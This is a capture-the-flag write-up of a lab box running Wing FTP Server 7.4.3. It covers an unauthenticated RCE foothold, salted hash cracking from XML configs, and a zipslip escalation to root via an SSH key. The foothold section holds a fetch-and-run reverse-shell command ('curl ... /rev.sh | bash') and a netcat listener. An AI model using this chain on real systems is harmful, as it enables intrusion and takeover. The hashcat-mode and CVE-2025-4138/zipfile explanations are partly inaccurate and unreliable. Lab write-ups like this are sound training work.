WingData
Overview
WingData is an easy Linux box running Wing FTP Server 7.4.3 on a subdomain
discovered through the web portal. The version is vulnerable to an unauthenticated
RCE (ExploitDB 52347), landing a shell as the wingftp service user. The server’s
XML configuration files store HMAC-SHA256 password hashes salted with :WingFTP;
cracking them recovers credentials for a local system user. That user’s home directory
contains a backup script run as root that extracts attacker-controlled zip archives —
exploitable via CVE-2025-4138 (Python zipslip in Python 3.12+) to write an
arbitrary file as root.
Path: Wing FTP 7.4.3 RCE → wingftp service shell → hash cracking from XML
config → SSH as local user → zipslip CVE-2025-4138 → root.
Enumeration
A standard nmap scan shows SSH and an Apache web server redirecting to wingdata.htb:
$ nmap -T4 -A 10.129.10.205
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7
80/tcp open http Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://wingdata.htb/

After adding wingdata.htb to /etc/hosts, the web portal’s “Client Portal” button
reveals a subdomain: ftp.wingdata.htb.

Browsing to http://ftp.wingdata.htb shows a Wing FTP Server web interface reporting
version 7.4.3.
Foothold — Wing FTP Server Unauthenticated RCE
Wing FTP Server 7.4.3 is vulnerable to an unauthenticated remote code execution flaw documented at ExploitDB 52347. The public exploit confirms the target is vulnerable and accepts a command to execute:
$ python3 exploit.py -u http://ftp.wingdata.htb
[*] Testing target: http://ftp.wingdata.htb
[+] http://ftp.wingdata.htb is vulnerable!
I hosted a reverse shell script and used the exploit to fetch and execute it:
$ nc -lvnp 8081
$ python3 exploit.py -u http://ftp.wingdata.htb -c 'curl 10.10.16.244:8888/rev.sh | bash'

The shell arrives as wingftp.
User — Cracking Wing FTP Password Hashes
The Wing FTP data directory contains XML configuration files for both admin accounts and regular FTP users:
wingftp@wingdata:/opt/wftpserver/Data$ ls
1 _ADMINISTRATOR bookmark_db settings.xml ssh_host_ecdsa_key ssh_host_key
The admin account config at _ADMINISTRATOR/admins.xml contains a SHA-256 hash:
<Admin_Name>admin</Admin_Name>
<Password>a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba</Password>
The user XML files in Data/1/users/ contain hashes for several accounts — maria,
steve, wacky, john, and anonymous. Wing FTP salts its hashes with :WingFTP
appended to the plaintext before hashing.
Running linpeas confirms the service configuration and helps identify the hash format:


Cracking with the correct salt (hashcat mode 1400 — SHA-256 with the password concatenated with the salt string):
$ hashcat -m 1400 -a 0 <hash> /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt --force
One of the user hashes cracks to reveal a password:
!#7Blushing^*Bride5

That password works for SSH access as the corresponding local system user.

The user flag is in that user’s home directory.
Privilege Escalation — CVE-2025-4138 (Python Zipslip)
Exploring the home directory reveals a backup script that extracts zip archives from an uploads or backup staging location into a destination directory:

The script runs as root (via cron or a sudo rule) and uses Python’s zipfile module
to extract archives. Python versions before 3.12 reject path-traversal entries in zip
files by default, but CVE-2025-4138 describes a bypass allowing the extraction
filter to be circumvented even in Python 3.12+, enabling classic zipslip — writing
files outside the extraction target directory.
By crafting a zip archive with a path-traversal entry (e.g., ../../root/.ssh/authorized_keys)
and placing it in the directory the backup script reads from, the next script
execution writes the attacker-controlled content to the traversed path as root.

Dropping an SSH public key into /root/.ssh/authorized_keys via the zipslip completes
the escalation, and ssh root@wingdata.htb with the corresponding private key grants
a root shell.
Takeaways
- Wing FTP Server 7.4.3 ships with an unauthenticated RCE that is point-and-shoot with a public PoC — any internet-exposed instance on this version is fully compromised without credentials.
- CVE-2025-4138 demonstrates that zipslip remains relevant even in modern Python: root-owned scripts that extract attacker-controlled archives without safe extraction patterns are a reliable privilege escalation path regardless of Python version.